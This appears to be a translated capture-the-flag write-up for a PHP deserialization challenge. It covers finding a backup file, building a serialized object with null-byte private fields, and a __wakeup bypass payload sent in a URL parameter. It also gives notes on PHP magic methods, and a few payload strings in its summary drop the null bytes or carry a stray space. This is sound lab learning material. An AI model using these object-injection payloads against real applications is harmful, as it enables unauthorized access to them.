topic
Click on the page to display as follows
According to the page prompts, this website has backup files. The backup files are usually in bak file format and can be scanned with dirsearch.
A file was downloaded after the visit
There are some codes in it
A class file was found in index.php, a get parameter was passed, and then the passed value was deserialized.
In class.php, if username===admin, password=100, return flag
Construct a deserialization
<?php
class Name{
private $username = "admin";
private $password = 100;
}
$a = new Name();
$str=serialize($a);
echo $str;
?>
There are invisible characters between Name and password. The fields declared by private are private fields and are only visible in the declared class. They are not visible in subclasses of the class and object instances of the class. Therefore, when the field name of the private field is serialized, the class name and field name will be preceded by ASCII 0 characters (invisible characters)
So it was changed to
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
You also need to bypass the __wakeup function here
Construct payload
?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
Summarize
1. It can be judged from __destruct, __construct, __wakeup that there is a deserialization vulnerability.
2. PHP serialization and deserialization
Serialization: The function is serialize(), which compresses complex data types into a string. The data type can be an array, string, object, etc.
Deserialization: The function is unserialize(), The process of converting a string into a variable or object.
Commonly used built-in methods:
__construct(): initialized when an object is created, called when an object is created.
__wakeup() is triggered when unserialize is used.
__sleep() is triggered when serialize is used.
__destruction(): ends. Destroy the object when it is destroyed, called when an object is destroyed
3. The fields declared by private are private fields, which are only visible in the declared class and are not visible in subclasses of the class and object instances of the class. Therefore, when the field name of the private field is serialized, the class name and field name will be preceded by ASCII 0 characters (invisible characters)
4.__wakeup function bypass
When deserializing a string, if the value of the number of attributes is greater than the actual number of attributes, the execution of the __wakeup() function will be skipped
: O:4:"Name":2:{s:14:"Nameusername" ;s:5:"admin";s:14:"Namepassword";i:100;}
Bypass: O:4:"Name":3:{s:14:"Nameusername";s:5:"admin ";s:14:"Namepassword";i:100;}
Reference learning link:
[Geek Challenge 2019]PHP unserialize_buuctf [Geek Challenge 2019]php-CSDN Blog